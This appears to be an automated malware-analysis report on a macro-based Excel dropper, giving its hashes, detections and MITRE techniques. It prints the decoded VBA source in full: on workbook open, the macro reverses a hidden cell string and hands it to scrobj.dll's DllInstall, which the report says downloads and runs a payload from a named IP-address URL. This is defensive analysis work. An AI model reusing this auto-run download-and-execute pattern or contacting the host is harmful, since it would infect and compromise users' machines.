Xls.Dropper.Agent-8934757-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 e4e5c009743f614b…

MALICIOUS

Office (OLE)

138.0 KB Created: 2020-06-29 03:16:30 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: 2b75670314f97f95d793b15a3c0ce009 SHA-1: 121f3488a3938797e447355cf19a4939621cb79b SHA-256: e4e5c009743f614b174429e1fe812966cd7f0a120b94942ced1f247eada4c987
122 Risk Score

Malware Insights

Xls.Dropper.Agent-8934757-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a Workbook_Open VBA macro. This macro calls two subroutines, fffff and zzz. The fffff subroutine reverses a string from cell X600 and places it in X700. The zzz subroutine then uses DllInstall to execute the string found in Sheet1.Range("X700").value. This string is reconstructed from the DOC BODY as http://62.138.8.182/wwwwx, which is then executed. This indicates the file is a macro-based dropper designed to download and execute a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Dropper.Agent-8934757-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-8934757-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://62.138.8.182/wwwwx In document text (OLE body)
    • http://62.138.8.182/wwwwx�In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1336 bytes
SHA-256: 8579ea3d1690559cab8b535c343354ce4e26c3f5e51d282fe49c9bfb6d250189
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function DllInstall Lib "scrobj.dll" (ByVal DllInstall As Boolean, ByRef pszCmdLine As Any) As Long
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox

Sub fffff()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
Range("X700").Value = StrReverse(Range("X600"))
End Sub
Sub zzz()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
DllInstall False, ByVal StrPtr(Sheet1.Range("X700").Value)
End Sub

Private Sub Workbook_Open()
'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox'MsgBox
fffff
zzz
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.